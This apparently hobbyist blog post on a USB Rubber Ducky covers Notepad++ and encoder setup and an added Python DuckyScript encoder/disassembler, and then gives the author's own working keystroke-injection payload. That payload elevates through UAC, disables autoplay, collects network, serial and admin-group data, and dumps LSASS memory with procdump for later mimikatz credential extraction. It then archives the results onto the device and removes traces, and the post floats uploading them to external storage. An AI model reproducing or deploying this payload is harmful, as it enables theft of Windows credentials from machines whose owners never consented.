Rubber Ducky
So I just got a Rubber Ducky and have been playing around with it.
Here is some of what I did in my first couple of days.
The first thing I did was import the DuckyScript language definition into Notepad++ so I could write my scripts there.
You can find the XML file here: https://forums.hak5.org/topic/21045-encoder-duckyscript-notepad-userdefinedlanguage/
I also set up a custom console command in Notepad++ to compile the scripts with duckencoder.jar. Run from the script directory, it looks like this:
Current directory: C:\users\******\Desktop\Ducky
java -jar duckencoder.jar -i ipconfig -o inject.bin
(-i is the DuckyScript source file, here one I named ipconfig; -o is the inject.bin that goes in the root of the SD card and that the Ducky replays when plugged in.)
I also flashed the Twin Duck firmware, which makes the Ducky enumerate as a mass-storage device as well as a keyboard, so the payload can read from and write to the SD card while it runs:
https://forums.hak5.org/topic/28162-firmware-introducing-twin-duck/
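To make the compile step less of a black box, here is a small Python encoder and disassembler I added as an example; it is not the post's code and not Hak5's duckencoder. It covers only the subset of DuckyScript the script below uses (REM, DELAY, DEFAULTDELAY, STRING, a named key on its own, and MODIFIER KEY combos) on a US keyboard layout. The inject.bin record format is an assumption on my part, based on how the original encoder behaves as far as I know: two bytes per keystroke (HID usage code, then modifier mask), and DELAY n written as 0x00 followed by min(n, 255) milliseconds, repeated until n is used up. The demo script inside it is constructed for the example.

```python
"""Added example: minimal DuckyScript -> inject.bin encoder and disassembler (US layout).

Assumed record format (not documented on the page):
  keystroke : 2 bytes, HID usage code then modifier mask
  DELAY n   : 0x00 followed by min(n, 255); repeated until n is used up
"""

MOD = {"CTRL": 0x01, "CONTROL": 0x01, "SHIFT": 0x02, "ALT": 0x04,
       "GUI": 0x08, "WINDOWS": 0x08}
# A modifier pressed on its own (a bare GUI line) is sent as its own usage code.
MODKEY = {"CTRL": 0xE0, "CONTROL": 0xE0, "SHIFT": 0xE1, "ALT": 0xE2,
          "GUI": 0xE3, "WINDOWS": 0xE3}
# Named keys -> HID usage code (a handful; extend as needed).
KEYS = {"ENTER": 0x28, "ESCAPE": 0x29, "ESC": 0x29, "TAB": 0x2B, "SPACE": 0x2C,
        "DELETE": 0x4C, "RIGHT": 0x4F, "LEFT": 0x50, "DOWN": 0x51, "UP": 0x52}

# US layout: printable character -> (usage code, modifier mask).
CHARS = {}
for i, c in enumerate("abcdefghijklmnopqrstuvwxyz"):
    CHARS[c] = (0x04 + i, 0x00)
    CHARS[c.upper()] = (0x04 + i, MOD["SHIFT"])
for i, c in enumerate("1234567890"):
    CHARS[c] = (0x1E + i, 0x00)
for c, digit in zip("!@#$%^&*()", "1234567890"):
    CHARS[c] = (CHARS[digit][0], MOD["SHIFT"])
_PUNCT = {" ": 0x2C, "-": 0x2D, "=": 0x2E, "[": 0x2F, "]": 0x30, "\\": 0x31,
          ";": 0x33, "'": 0x34, "`": 0x35, ",": 0x36, ".": 0x37, "/": 0x38}
_SHIFTED = {"_": "-", "+": "=", "{": "[", "}": "]", "|": "\\", ":": ";",
            '"': "'", "~": "`", "<": ",", ">": ".", "?": "/"}
for c, code in _PUNCT.items():
    CHARS[c] = (code, 0x00)
for c, base in _SHIFTED.items():
    CHARS[c] = (_PUNCT[base], MOD["SHIFT"])

# Reverse tables for the disassembler (first mapping wins for duplicate codes).
_REV_CHARS = {}
for ch, pair in CHARS.items():
    _REV_CHARS.setdefault(pair, ch)
_REV_KEYS = {v: k for k, v in list(KEYS.items()) + list(MODKEY.items())}


def _delay(ms):
    out = bytearray()
    while ms > 0:
        chunk = min(ms, 255)
        out += bytes([0x00, chunk])
        ms -= chunk
    return bytes(out)


def _key(token):
    """Resolve one key token ('r', 'ENTER') to (usage code, modifier mask)."""
    if token.upper() in KEYS:
        return KEYS[token.upper()], 0x00
    if len(token) == 1 and token in CHARS:
        return CHARS[token]
    raise ValueError(f"unknown key: {token!r}")


def encode(script):
    """Encode DuckyScript text into inject.bin bytes."""
    out = bytearray()
    default_delay = 0
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        cmd, sep, arg = line.partition(" ")
        cmd = cmd.upper()
        if cmd == "REM":
            continue
        if cmd in ("DEFAULT_DELAY", "DEFAULTDELAY"):
            default_delay = int(arg)
            continue
        if cmd == "DELAY":
            out += _delay(int(arg))
        elif cmd == "STRING":
            for ch in arg:                      # KeyError on a char the layout lacks
                out += bytes(CHARS[ch])
        else:                                   # named key, or MOD [MOD ...] KEY
            tokens = line.split()
            mask = 0
            while len(tokens) > 1 and tokens[0].upper() in MOD:
                mask |= MOD[tokens.pop(0).upper()]
            if len(tokens) != 1:
                raise ValueError(f"cannot encode: {line!r}")
            if tokens[0].upper() in MODKEY:     # bare modifier, e.g. GUI opens Start
                out += bytes([MODKEY[tokens[0].upper()], 0x00])
            else:
                code, key_mask = _key(tokens[0])
                out += bytes([code, mask | key_mask])
        if default_delay:                       # assumed: default delay follows every command
            out += _delay(default_delay)
    return bytes(out)


def decode(blob):
    """Disassemble inject.bin bytes into readable DuckyScript-like lines."""
    steps, i = [], 0
    while i + 1 < len(blob):
        code, mask = blob[i], blob[i + 1]
        i += 2
        if code == 0x00:                        # delay record; merge runs of them
            if steps and steps[-1].startswith("DELAY "):
                steps[-1] = f"DELAY {int(steps[-1][6:]) + mask}"
            else:
                steps.append(f"DELAY {mask}")
        elif (code, mask) in _REV_CHARS:        # plain or shifted printable char
            ch = _REV_CHARS[(code, mask)]
            if steps and steps[-1].startswith("STRING "):
                steps[-1] += ch
            else:
                steps.append("STRING " + ch)
        else:
            mods = [n for n, b in (("CTRL", 1), ("SHIFT", 2), ("ALT", 4), ("GUI", 8)) if mask & b]
            name = _REV_KEYS.get(code) or _REV_CHARS.get((code, 0), f"0x{code:02x}")
            steps.append(" ".join(mods + [name]))
    return steps


if __name__ == "__main__":
    # Constructed demo (not the post's payload): open Run, type cmd, press Enter.
    demo = "REM demo\nDELAY 300\nGUI r\nSTRING cmd\nENTER\n"
    blob = encode(demo)
    print(blob.hex(" "))
    print("\n".join(decode(blob)))
```

The decode() half is the part I find useful in practice: if you pull an inject.bin off an SD card you did not write, it shows you exactly what the device would type, without plugging it into anything. The real duckencoder supports other keyboard layouts through its -l option; this toy only knows US, and will raise a KeyError on any character outside the tables above rather than silently typing the wrong key.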
My first little script borrows a bit from some other posts, but I'm still not entirely happy with it:
REM *** Elevate through the UAC prompt (needs an admin account; ALT y answers the consent dialog) ***
DELAY 3000
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 500
ALT y
DELAY 200
STRING reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers /v DisableAutoplay /t REG_DWORD /d 1 /f
ENTER
REM *** Define the Ducky's storage drive as %duck% (findstr matches the SD card's volume label; change "_" to whatever your card is labelled)
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "_"') do set duck=%d
ENTER
DELAY 100
STRING RMdir /s /q %duck%\Finds
ENTER
DELAY 100
STRING set duckytemp=C:\Temp\Ducky
ENTER
DELAY 100
STRING mkdir C:\Temp\Ducky
ENTER
DELAY 100
STRING mkdir %duck%\Finds\%computername%
ENTER
DELAY 100
STRING set duckypath=%duck%\Finds\%computername%
ENTER
DELAY 100
STRING ipconfig /all > %duckytemp%\%computername%.ipconfig.txt
ENTER
DELAY 200
STRING wmic bios get serialnumber > %duckytemp%\%computername%.serial.txt
ENTER
DELAY 100
STRING net localgroup administrators > %duckytemp%\%computername%.admins.txt
ENTER
DELAY 100
STRING %duck%\procdump64.exe -accepteula -ma lsass.exe %duckytemp%\%computername%.lsass.dmp
ENTER
DELAY 3000
STRING %duck%\7za.exe a %duckypath%\%computername%.7z %duckytemp%\*
ENTER
DELAY 5000
STRING rmdir /s /q %duckytemp%
ENTER
STRING exit
ENTER
So what I'm doing here is dumping the output of ipconfig /all, getting the serial number of the computer, getting a list of the local admin users, and dumping LSASS memory to run through mimikatz later.
I write these all to a temp directory on the computer, then zip them up onto the flash drive.
The write speed to the SD card is stupid slow, so this isn't a great solution; the whole thing takes about 4 minutes to run.
I think uploading the zip file to an external storage location is probably a better solution; I just don't have the time to do that right now.